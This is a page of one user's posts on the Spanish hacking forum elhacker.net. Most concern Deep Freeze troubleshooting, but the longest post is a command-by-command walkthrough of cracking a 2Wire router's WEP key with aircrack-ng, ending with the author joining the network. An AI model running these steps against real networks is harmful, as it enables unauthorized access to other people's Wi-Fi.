elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1]
1  Media / Multimedia / Re: Sobre Youtube en: 20 Enero 2008, 04:03 am
sin duda andan perdidos.....lo mejor que e encontrado es el aTube catcher que es gratis y esta sensacional. no solo lo baja sino que lo pone practicamente en cualquiier formato q decees....no hay de otra. es lo mejor...
saludos
2  Informática / Tutoriales - Documentación / Re: DEEP FREEZE en: 14 Enero 2008, 22:31 pm
Fijense que expuse mi problema a un colega comentandole mis problemas y le comente lo que creia que era.. (les recuerdo que suponia que era alguna actualizacion de windows o el antivirus)....y pues me dijo que el tuvo el mismo problema y, hoy dia lo asociamos al NOD32 que es el antivirus que tenemos instalado en nuestras maquinas. el me dijo que lo desinstalo e instalo el Karspesky y al instalar nuevamente el deep no tuvo mayor problema...esto, aclaro, lo hizo despues de formatear desde cero la maquina y dejarla cpon todas sus actualizaciones.

en concreto.  Pieso que alguna actualizacion del NOD32 es la que nos esta metiendo calambres a muchos como yo con el sistema en conjuncion con las actualizaciones de WinXPSP2.   hare la prueba personalmente y les comentarew como me fue.

Lo hare con la version 4.0...del Deep y con la 6.... del deep para comentarle los resultados y las diferencias

Saludos a todos los foreros
3  Informática / Tutoriales - Documentación / Re: DEEP FREEZE en: 21 Diciembre 2007, 21:12 pm
ME MUERO DEL CORAJE........
RECUERDAN QUE LES COMENTE QUE HABIA SOLUCIONADO MI PROBLEMA CON EL DEEP f ...PUES AL INSTALAR LA VERSION 6 ME HIZO EXACTAMENTE LO MSIMO PERO AHORA LA HERRAMIENTA QUE ME FUNCIONO EN UN PRINCIPIO SIMPLEMENTE NO JALA...ESTOY FURIOSO....Y SI NO ENCUENTRO ALGO PRONTO TENDRE QUE EMPEZAR DE CERO CON ESA MAQUINA...

BUENO...HAY LES COMENTARE LO QUE SUCEDA....
Ç
POR CIERTO....LO MAS CURIOSO ESQUE TENGO UNA MAQUINA CON LA VERSION ANTERIOR FUNCIONANDO PERFECTAMENTE CON EL DEEP FREER...ESTOY DESCONCERTADO.....NO SE QUE SEA

BUENO....NOS VEMOS
4  Informática / Tutoriales - Documentación / Re: DEEP FREEZE en: 21 Diciembre 2007, 01:11 am
POR FIN....¡¡¡¡¡¡¡....ENCONTRE ALGO QUE ME FUNCIONO.......AQUI LES VA LA INDICACION:

1.-   Descargar el programa que te permite desactivar y por tanto desinstalar el DF.
2.-   Descargar el manual de uso.


Les cuanto mi experiencia:  Tenia el problema de que al actualizar mi pc con el Windowes update y querer reactivar la proteccion del DF simplemente me dejava colgado y no me permitia hacer absolutamente nada. Comente que en un caso me dejo desinstalarlo y con una nueva instalacion me hacia lo mismo. aunque ahora nisiquiera lo podia desactivar....eso me estaba frustrando. pero ahora les cuento

Entre en modo Seguro sin funciones de red a mi maquina y ejecute el programa, defini la ruta del ejecutable del DF y cambie su estado..ME LO PERMITIO¡¡¡¡QUE EMOCION.....despues simplemente reinicie mi maquina y Gualaaa.....ya estaba desactivado y por tanto apto para la desinstalacion.

cabe enfatizar que yo corria la version 4.20.020.0598 en mi maquina y ahora hare la prueba con una mas actual haber si cpon ello corrijo mi problema original que fue el de mantener al 100% de actualizaciones mis maquinas con el windows update.

dejo las ligas mis amigos:

http://usuarios.arnet.com.ar/fliamarconato/pages/DeepUnfreezer1.6.exe   programa

http://usuarios.arnet.com.ar/fliamarconato/pages/smanual.html  manual

Cualquier comentario estoy a sus ordenes

seguire informandoles
 ;D :rolleyes: :xD

5  Informática / Tutoriales - Documentación / Re: DEEP FREEZE en: 19 Diciembre 2007, 03:35 am
Pues...ahora si que estoy en broncas....de plano no se dejo.....corri el que se supone es un cd para bootear con el pero nada....dice que supuestamente lo quita pero al reiniciar simplemente sigue igual....... :huh:   caray......ahorasi que estoy en problemas......si no encuentro algo pronto tendre que darle foprmato y empezar desde cero a 6 MAQUINAS¡¡¡¡¡ SI ASI SOY DE TONTO.....BUENO seguyiremos buscando haber quetal..

suerte a los que tienen el mismo problema que yo (no el de mi coeficiente intelectual) sino el de el df..je..
bye
si encuentro algo se los comunicare
6  Informática / Tutoriales - Documentación / Estoy frito... en: 17 Diciembre 2007, 23:56 pm
Les comento lo que me pasa      :¬¬ tengo varias computadoras con el deep freeze instalado y al paracer trabajaban bien.

fue entonces cuando descargue absolutamente todas las actualizaciones de Microsoft (Porque lo puedo hacer), y porsupuesto desactive el DF. entonces ya que quise volver a congelar mi unidad PEEEELASSS....QUE YA NO JALA SOLO SE QUEDABA CONGELADA.....entonces lo desinsrale...y lo reinstale...pensando que esto me podria ayudar a corregir alguna configuracion o algo pero.....ahora no solo no puedo poner la contraseña y no que tampoco me deja desinstalarlo y no hayo que hacer......en este foro encontre la siguiente liga   http://www.ulises2k.com.ar/programas/index.php ...misma que probare...espero que algo pueda hacer y lo que salga les comentare....
mi sistema es XP SP2 completamente actualizado al dia de hoy.

Gracias por los consejos amigos
7  Seguridad Informática / Wireless en Linux / Re: Hacking de routers INFINITUM (2Wire) en Mexico en: 2 Diciembre 2007, 00:38 am
Hola a Todos....CARAY....COMO AGRADECER SU AYUDA......DESPUES DE MUCHO BUSCAR ESTE FORO ME ABRIO LAS PUERTAS A UN MUNDO DIFERENTE y pues quiero compartir con ustedes mi experiencia.

Tengo una Tarjeta de Red Inhalambrica  AWLH4130 de Airlink PCI con chip atheros y despues de imprimir y mucho releer los comentarios de este gran foro me di a la tarea de ponerlo a la practica de lo cual comento lo sigueinte

1. Efectivamente descarge el programa NetStumbler de su portal de internet y lo instale en mi maquina con Win XP SP2 y funciono sin ningun problema. en dicho programa comprobe las redes que detectaba mi Tarejeta de Red y ubico porlomenos 3 redes de INFINITUM de las cuales seleccione la que tenía permiso para auditar con un rango de -60 Db o menor copiando su MAC (AA:BB:CC:DD:EE:FF) , su SSID (INFINITUMXXXX) y el canal en el que trabajaba (6)

2. Descarge la ultima version del WIFISLAX (La 3.1) y grabe la imagen en un CD normal para posteriormente Reiniciar mi sistema y arrancarlo en mi PC cambiando la primera Opcion del Booteo a la del CD. Funciono perfectamente y al entrar solo le di las claves de acceso Login: root   y pass:  toor      posteriormente solo teclee    startx para hacer correr el entorno de windows y empezo la aventura.

3.  Abri una consola, teclee iwconfig para saber el nombre que el sistema le daba a mi tarejeta resultando ser ath0, la deshabilite con ifconfig ath0 down y segui los primeros pasos que se mencionan en este foro que son:

iwconfig ath0 rate 1M channel 6     (luego enter por aquellos que no lo intuyen)
ifconfig ath0 hw ether 00:11:22:33:44:55   (Luego enter)
airmon-ng start ath0   (luego enter)

este ultimo paso era elque me daba el error de que mi tarjeta no estaba habilitada en modo  monitor. pense que talvez debia activar la tarjeta antes de ejecutar la tercera linea mencionada con el comando "ifconfig ath0 up" sin embargo el error era el mismo

checando nuevamente con iwconfig ath0 veia que aparentemente si cambiaba a 1M e inclusive la Mac pero el modo Monitor simplemente no funcionaba. solo aparecia MANAGED.

Intente hacerlo de muchas formas (inclusibe baje el otro programa que s menciona en este foro (Wifiway la ultima version para probar y nada)

Inicie nuevamente mi sistema con el wifislax y comence a observar los menus y la interfas del programa y al llegar a la esquina inferior derecha sobre el boton KDE MENU DI CLIC y despues buscando encontre lo siguiente:

kde menu>Wifislax>Asistencia de Chipset>Asistencia de chipset atheros>Modo monitor

le di a la opcion y de inmediato se abrio una consola y se desplego la informacion de que la tarjeta ya estaba ahora si en modo monitor (Casi saltaba del gusto) 


4. Despues de esta aventura inicie a teclear tal cual las lineas que se describen en el manual aqui presentado que van mas o menos asi

iwconfig ath0 rate 1M channel 6   (Enter)
ifconfig ath0 hw ether 00:11:22:33:44:55    (enter)
airmon-ng start ath0   (enter)

y guala....todo funciono correctamente.

5. abri otra terminal y teclee lo siguiente

airodump-ng --bssid AA:BB:CC:DD:EE:FF -w crackinfinitum -c 6 ath0
 y comenzo a capturar paquetes

6. abri otra terminal y teclee

aireplay-ng -1 6 -e INFINITUMXXXX -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 ath0

y me confirmo la autentificacion

7. abri otra terminal y teclee

areplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 ath0

no hubo mayor problema

8. ya por ultimo en la primera ventana que abri teclee Ctrl+c y escribi la siguiente linea

aircrack-ptw crackinfinitum-01.cap

y de inmediato me mando los codigos de la red auditada

9. me sali del programa reinicie mi maquina con el sistema operativo win xp y me intente conectar con la red AUDITADA y cuando me pidio la clave de acceso pues meti la que encontre....y se hizo la luz.....si asi fue....

Gracias a todos los que ayudaron a este pobre elemento que es novato pero que aprecia su gran talento y dedicacion....

cualquier comentario escribanme ESTO ES UN FORO

----------------------------

Te he modificado unos cuantos "parámetros".... espero que no se vuelva a repetir......ok :-\
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines